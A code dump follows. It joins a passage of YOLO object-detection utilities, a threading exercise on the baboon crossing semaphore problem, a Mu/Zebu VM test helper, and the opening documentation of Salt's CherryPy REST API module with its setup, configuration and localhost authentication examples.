boxes1_area = (boxes1[..., 2] - boxes1[..., 0]) * (boxes1[..., 3] - boxes1[..., 1])
boxes2_area = (boxes2[..., 2] - boxes2[..., 0]) * (boxes2[..., 3] - boxes2[..., 1])
left_up = np.maximum(boxes1[..., :2], boxes2[..., :2])
right_down = np.minimum(boxes1[..., 2:], boxes2[..., 2:])
inter_section = np.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
union_area = boxes1_area + boxes2_area - inter_area
ious = np.maximum(1.0 * inter_area / union_area, np.finfo(np.float32).eps)
return ious
def nms(bboxes, iou_threshold, sigma=0.3, method='nms'):
"""
:param bboxes: (xmin, ymin, xmax, ymax, score, class)
Note: soft-nms, https://arxiv.org/pdf/1704.04503.pdf
https://github.com/bharatsingh430/soft-nms
"""
classes_in_img = list(set(bboxes[:, 5]))
best_bboxes = []
for cls in classes_in_img:
cls_mask = (bboxes[:, 5] == cls)
cls_bboxes = bboxes[cls_mask]
# Process 1: Determine whether the number of bounding boxes is greater than 0
while len(cls_bboxes) > 0:
            # Process 2: Select the bounding box A with the highest score
max_ind = np.argmax(cls_bboxes[:, 4])
best_bbox = cls_bboxes[max_ind]
best_bboxes.append(best_bbox)
cls_bboxes = np.concatenate([cls_bboxes[: max_ind], cls_bboxes[max_ind + 1:]])
            # Process 3: Calculate the IoU between box A and all remaining boxes,
            # then suppress the boxes whose IoU with A exceeds the threshold
iou = bboxes_iou(best_bbox[np.newaxis, :4], cls_bboxes[:, :4])
weight = np.ones((len(iou),), dtype=np.float32)
assert method in ['nms', 'soft-nms']
if method == 'nms':
iou_mask = iou > iou_threshold
weight[iou_mask] = 0.0
if method == 'soft-nms':
weight = np.exp(-(1.0 * iou ** 2 / sigma))
cls_bboxes[:, 4] = cls_bboxes[:, 4] * weight
score_mask = cls_bboxes[:, 4] > 0.
cls_bboxes = cls_bboxes[score_mask]
return best_bboxes
def postprocess_boxes(pred_bbox, original_image, input_size, score_threshold):
valid_scale=[0, np.inf]
pred_bbox = np.array(pred_bbox)
pred_xywh = pred_bbox[:, 0:4]
pred_conf = pred_bbox[:, 4]
pred_prob = pred_bbox[:, 5:]
# 1. (x, y, w, h) --> (xmin, ymin, xmax, ymax)
pred_coor = np.concatenate([pred_xywh[:, :2] - pred_xywh[:, 2:] * 0.5,
pred_xywh[:, :2] + pred_xywh[:, 2:] * 0.5], axis=-1)
# 2. (xmin, ymin, xmax, ymax) -> (xmin_org, ymin_org, xmax_org, ymax_org)
org_h, org_w = original_image.shape[:2]
resize_ratio = min(input_size / org_w, input_size / org_h)
dw = (input_size - resize_ratio * org_w) / 2
dh = (input_size - resize_ratio * org_h) / 2
pred_coor[:, 0::2] = 1.0 * (pred_coor[:, 0::2] - dw) / resize_ratio
pred_coor[:, 1::2] = 1.0 * (pred_coor[:, 1::2] - dh) / resize_ratio
# 3. clip some boxes those are out of range
pred_coor = np.concatenate([np.maximum(pred_coor[:, :2], [0, 0]),
np.minimum(pred_coor[:, 2:], [org_w - 1, org_h - 1])], axis=-1)
invalid_mask = np.logical_or((pred_coor[:, 0] > pred_coor[:, 2]), (pred_coor[:, 1] > pred_coor[:, 3]))
pred_coor[invalid_mask] = 0
# 4. discard some invalid boxes
bboxes_scale = np.sqrt(np.multiply.reduce(pred_coor[:, 2:4] - pred_coor[:, 0:2], axis=-1))
scale_mask = np.logical_and((valid_scale[0] < bboxes_scale), (bboxes_scale < valid_scale[1]))
# 5. discard boxes with low scores
classes = np.argmax(pred_prob, axis=-1)
scores = pred_conf * pred_prob[np.arange(len(pred_coor)), classes]
score_mask = scores > score_threshold
mask = np.logical_and(scale_mask, score_mask)
coors, scores, classes = pred_coor[mask], scores[mask], classes[mask]
return np.concatenate([coors, scores[:, np.newaxis], classes[:, np.newaxis]], axis=-1)
def detect_image(Yolo, image_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
original_image = cv2.imread(image_path)
    original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
    original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)  # note: applying BGR2RGB twice swaps the channels back to BGR
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
if output_path != '': cv2.imwrite(output_path, image)
if show:
# Show the image
cv2.imshow("predicted image", image)
# Load and hold the image
cv2.waitKey(0)
        # Close the window after any key is pressed
cv2.destroyAllWindows()
return image
def Predict_bbox_mp(Frames_data, Predicted_data, Processing_times):
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
try: tf.config.experimental.set_memory_growth(gpus[0], True)
        except RuntimeError: print("RuntimeError while enabling GPU memory growth")
Yolo = Load_Yolo_model()
times = []
while True:
if Frames_data.qsize()>0:
image_data = Frames_data.get()
t1 = time.time()
Processing_times.put(time.time())
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
Predicted_data.put(pred_bbox)
def postprocess_mp(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime):
times = []
while True:
if Predicted_data.qsize()>0:
pred_bbox = Predicted_data.get()
if realtime:
while original_frames.qsize() > 1:
original_image = original_frames.get()
else:
original_image = original_frames.get()
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
times.append(time.time()-Processing_times.get())
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
#print("Time: {:.2f}ms, Final FPS: {:.1f}".format(ms, fps))
Processed_frames.put(image)
def Show_Image_mp(Processed_frames, show, Final_frames):
while True:
if Processed_frames.qsize()>0:
image = Processed_frames.get()
Final_frames.put(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
# detect from webcam
def detect_video_realtime_mp(video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors='', realtime=False):
if realtime:
vid = cv2.VideoCapture(0)
else:
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
no_of_frames = int(vid.get(cv2.CAP_PROP_FRAME_COUNT))
original_frames = Queue()
Frames_data = Queue()
Predicted_data = Queue()
Processed_frames = Queue()
Processing_times = Queue()
Final_frames = Queue()
p1 = Process(target=Predict_bbox_mp, args=(Frames_data, Predicted_data, Processing_times))
p2 = Process(target=postprocess_mp, args=(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime))
p3 = Process(target=Show_Image_mp, args=(Processed_frames, show, Final_frames))
p1.start()
p2.start()
p3.start()
while True:
ret, img = vid.read()
if not ret:
break
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
original_frames.put(original_image)
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
Frames_data.put(image_data)
while True:
if original_frames.qsize() == 0 and Frames_data.qsize() == 0 and Predicted_data.qsize() == 0 and Processed_frames.qsize() == 0 and Processing_times.qsize() == 0 and Final_frames.qsize() == 0:
p1.terminate()
p2.terminate()
p3.terminate()
break
elif Final_frames.qsize()>0:
image = Final_frames.get()
if output_path != '': out.write(image)
cv2.destroyAllWindows()
def detect_video(Yolo, video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times, times_2 = [], []
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
while True:
_, img = vid.read()
try:
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
except:
break
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
t3 = time.time()
times.append(t2-t1)
times_2.append(t3-t1)
times = times[-20:]
times_2 = times_2[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
fps2 = 1000 / (sum(times_2)/len(times_2)*1000)
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
if output_path != '': out.write(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
cv2.destroyAllWindows()
print("Time: {:.2f}ms, Detection FPS: {:.1f}, total FPS: {:.1f}".format(ms, fps, fps2))
# detect from webcam
def detect_realtime(Yolo, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times = []
vid = cv2.VideoCapture(0)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
while True:
_, frame = vid.read()
try:
original_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
original_frame = cv2.cvtColor(original_frame, cv2.COLOR_BGR2RGB)
except:
break
image_data = image_preprocess(np.copy(original_frame), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_frame, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
times.append(t2-t1)
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
print("Time: {:.2f}ms, {:.1f} FPS".format(ms, fps))
frame = draw_bbox(original_frame, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_frame, bboxes, read_class_names(CLASSES))
image = cv2.putText(frame, "Time: {:.1f}FPS".format(fps), (0, 30),
cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
if output_path != '': out.write(frame)
if show:
cv2.imshow('output', frame)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
cv2.destroyAllWindows()
|
baboon_problem.py
|
#!/usr/bin/env python
"""baboon_problem.py: Solve the baboon semaphore problem.
1. Once a baboon has begun to cross the canyon it is guaranteed to get across.
2. There are never more than 5 baboons on the rope
3. A continuing stream of baboons in one direction should not lock out the other
direction from crossing eventually."""
__author__ = "Justin Overstreet"
__copyright__ = "oversj96.github.io"
import threading
from random import *
import time
directions = ['left', 'right']
# baboons is a Semaphore object with acquire and release as built-in
# functions. These functions act as wait and signal respectively.
baboons = threading.Semaphore(0)
left_count = 0
right_count = 0
rope = threading.Semaphore(1)
direction = 'left'
def crossing():
global right_count
global left_count
global direction
while True:
baboons.acquire()
print("A baboon is attempting to cross")
rope.acquire()
print(f"A baboon has the rope and is going {direction}.")
        if direction == 'left' and left_count > 0:
left_count -= 1
direction = 'right'
        elif direction == 'right' and right_count > 0:
right_count -= 1
direction = 'left'
print(f"A baboon has crossed from the {direction}")
rope.release() # release acts like signal
print("A baboon has released the rope.")
def baboon(travel_direction):
global left_count
global right_count
baboons.release()
print(f"A baboon has arrived wanting to go {travel_direction}.")
    if travel_direction == "left":
left_count += 1
else:
right_count += 1
def generate_baboons():
global directions
while True:
if (right_count + left_count) > 100:
print("The baboon line is full!")
print(f"The right side has {right_count} ape(s).")
print(f"The left side has {left_count} ape(s).")
time.sleep(1)
else:
baboon(sample(directions, 1)[0])
if __name__ == "__main__":
t = threading.Thread(target = crossing)
t.start()
t2 = threading.Thread(target = generate_baboons)
t2.start()
|
util.py
|
# Copyright 2017 The Australian National University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess as subp
import os, sys
import ctypes
import py
from multiprocessing import Process
CC = os.environ.get('CC', 'clang')
# if $MU_ZEBU is defined, use that as the project directory, else define from file.
MU_ZEBU = os.environ.get('MU_ZEBU', '')
proj_dir = py.path.local(MU_ZEBU) if MU_ZEBU else py.path.local(__file__).join('..', '..', '..')
test_jit_dir = proj_dir.join('tests', 'test_jit')
testsuite_dir = test_jit_dir.join('suite')
# testsuite_dir = py.path.local('/Users/johnz/Documents/Work/mu-client-pypy/rpython/translator/mu/test_impl')
bin_dir = py.path.local('emit') # put everything under emit
if not bin_dir.exists():
bin_dir.mkdir()
if sys.platform.startswith('darwin'):
libext = '.dylib'
elif sys.platform.startswith('linux'):
libext = '.so'
else:
libext = '.dll'
libmu_build = os.environ.get('ZEBU_BUILD', 'debug')
libmu_dir_path = proj_dir.join('target', libmu_build)
libmu_dylib_path = proj_dir.join('target', libmu_build, 'libmu' + libext)
libmu_staticlib_path = proj_dir.join('target', libmu_build, 'libmu.a')
def mu_instance_via_ctyeps():
libmu = preload_libmu()
class MuVM(ctypes.Structure):
pass
MuVM._fields_ = [
('header', ctypes.c_voidp),
('new_context', ctypes.c_voidp), # function pointers should have the same size as c_voidp
('id_of', ctypes.c_voidp),
('name_of', ctypes.c_voidp),
('set_trap_handler', ctypes.c_voidp),
('compile_to_sharedlib', ctypes.c_voidp),
('current_thread_as_mu_thread', ctypes.CFUNCTYPE(None, ctypes.POINTER(MuVM), ctypes.c_voidp)),
]
libmu.mu_fastimpl_new.restype = ctypes.POINTER(MuVM)
mu = libmu.mu_fastimpl_new()
mu.contents.current_thread_as_mu_thread(mu, None)
return mu
def compile_c_script(c_src_name):
testname = c_src_name[:-2]
src_c = testsuite_dir.join(c_src_name)
bin_path = bin_dir.join(testname)
CFLAGS = [
"-std=c11",
"-I%(proj_dir)s/src/vm/api" % globals(),
"-L" + libmu_dir_path.strpath,
"-lmu"
]
cmd = [CC] + CFLAGS + ['-o', bin_path.strpath] + [src_c.strpath]
# compile
p = subp.Popen(cmd, stdout=subp.PIPE, stderr=subp.PIPE, env=os.environ)
out, err = p.communicate()
if p.returncode != 0: # failed
sys.stdout.write(out + '\n')
sys.stderr.write(err + '\n')
raise subp.CalledProcessError(p.returncode, cmd)
os.environ['LD_LIBRARY_PATH'] = "%s:%s" % (libmu_dir_path.strpath,
os.environ['LD_LIBRARY_PATH'] if 'LD_LIBRARY_PATH' in os.environ else "")
# run
p = subp.Popen([bin_path.strpath], stdout=subp.PIPE, stderr=subp.PIPE, env=os.environ)
out, err = p.communicate()
if p.returncode != 0: # failed
sys.stdout.write(out + '\n')
sys.stderr.write(err + '\n')
raise subp.CalledProcessError(p.returncode, bin_path)
return py.path.local('emit').join('lib%(testname)s' % locals() + libext)
def ctypes_fncptr_from_lib(libpath, fnc_name, argtypes=[], restype=ctypes.c_longlong, mode=ctypes.RTLD_GLOBAL):
lib = ctypes.CDLL(libpath.strpath, mode)
fnp = getattr(lib, fnc_name)
fnp.argtypes = argtypes
fnp.restype = restype
return fnp, lib
def rffi_fncptr_from_lib(libpath, fnc_name, llargtypes, restype, mode=ctypes.RTLD_GLOBAL):
from rpython.rtyper.lltypesystem import rffi
from rpython.translator.platform import platform
if platform.name.startswith('linux'):
link_extra = ['-Wl,-R' + libpath.dirpath().strpath]
else:
link_extra = []
libname = libpath.basename[3:libpath.basename.index(libext)]
if mode == ctypes.RTLD_GLOBAL:
lib = ctypes.CDLL(libpath.strpath, mode) # preload lib using RTLD_GLOBAL
return rffi.llexternal(fnc_name, llargtypes, restype,
compilation_info=rffi.ExternalCompilationInfo(
libraries=[libname],
library_dirs=[libpath.dirpath().strpath],
link_extra=link_extra
),
_nowrapper=True)
def fncptr_from_c_script(c_src_name, name, argtypes=[], restype=ctypes.c_ulonglong, mode=ctypes.RTLD_GLOBAL):
libpath = compile_c_script(c_src_name)
return ctypes_fncptr_from_lib(libpath, name, argtypes, restype, mode)
def is_ctypes(t):
return isinstance(t, type(ctypes.c_longlong))
def fncptr_from_py_script(py_fnc, heapinit_fnc, name, argtypes=[], restype=ctypes.c_longlong, mode=ctypes.RTLD_GLOBAL, **kwargs):
import os
# NOTE: requires mu-client-pypy
from rpython.rlib.rmu import zebu as rmu
# load libmu before rffi so to load it with RTLD_GLOBAL
libmu = preload_libmu()
emit_dir = kwargs.get('muemitdir', os.environ.get('MU_EMIT_DIR', 'emit'))
mu = rmu.MuVM("--aot-emit-dir=%(emit_dir)s" % locals())
ctx = mu.new_context()
bldr = ctx.new_ir_builder()
id_dict = py_fnc(bldr, rmu)
bldr.load()
if heapinit_fnc:
heapinit_fnc(ctx, id_dict, rmu)
libpath = py.path.local(emit_dir).join('lib%(name)s' % locals() + libext)
mu.compile_to_sharedlib(libpath.strpath, [])
if (len(argtypes) > 0 and is_ctypes(argtypes[0])) or is_ctypes(restype):
return ctypes_fncptr_from_lib(libpath, name, argtypes, restype, mode), (mu, ctx, bldr)
else:
return rffi_fncptr_from_lib(libpath, name, argtypes, restype, mode), (mu, ctx, bldr)
def preload_libmu():
# load libmu before rffi so to load it with RTLD_GLOBAL
return ctypes.CDLL(libmu_dylib_path.strpath, ctypes.RTLD_GLOBAL)
spawn_proc = bool(int(os.environ.get('SPAWN_PROC', '1')))
def may_spawn_proc(test_fnc):
def wrapper():
if spawn_proc:
p = Process(target=test_fnc, args=tuple())
p.start()
p.join()
assert p.exitcode == 0
else:
test_fnc()
return wrapper
def fncptr_from_rpy_func(rpy_fnc, llargtypes, llrestype, mode=ctypes.RTLD_GLOBAL, **kwargs):
# NOTE: requires mu-client-pypy
from rpython.rtyper.lltypesystem import rffi
from rpython.translator.interactive import Translation
from rpython.config.translationoption import set_opt_level
preload_libmu()
emit_dir = os.environ.get('MU_EMIT_DIR', str(bin_dir))
kwargs.setdefault('backend', 'mu')
kwargs.setdefault('impl', 'zebu')
kwargs.setdefault('codegen', 'api')
kwargs.setdefault('testjit', True)
kwargs.setdefault('vmargs', "--aot-emit-dir=" + emit_dir)
kwargs.setdefault('suplibdir', str(bin_dir))
kwargs.setdefault('no_ovf', True)
t = Translation(rpy_fnc, llargtypes, **kwargs)
set_opt_level(t.config, '3')
if kwargs['backend'] == 'mu':
db, bdlgen, fnc_name = t.compile_mu()
emit_dir = py.path.local(emit_dir)
libpath = emit_dir.join('lib%(fnc_name)s' % locals() + libext)
bdlgen.mu.compile_to_sharedlib(libpath.strpath, [])
extras = (db, bdlgen)
else:
libpath = t.compile_c()
fnc_name = 'pypy_g_' + rpy_fnc.__name__
extras = None
return rffi_fncptr_from_lib(libpath, fnc_name, llargtypes, llrestype, mode), extras
|
app.py
|
"""
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
.. note::
This module is Experimental on Windows platforms and supports limited
configurations:
- doesn't support PAM authentication (i.e. external_auth: auto)
- doesn't support SSL (i.e. disable_ssl: True)
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log.access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log.error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
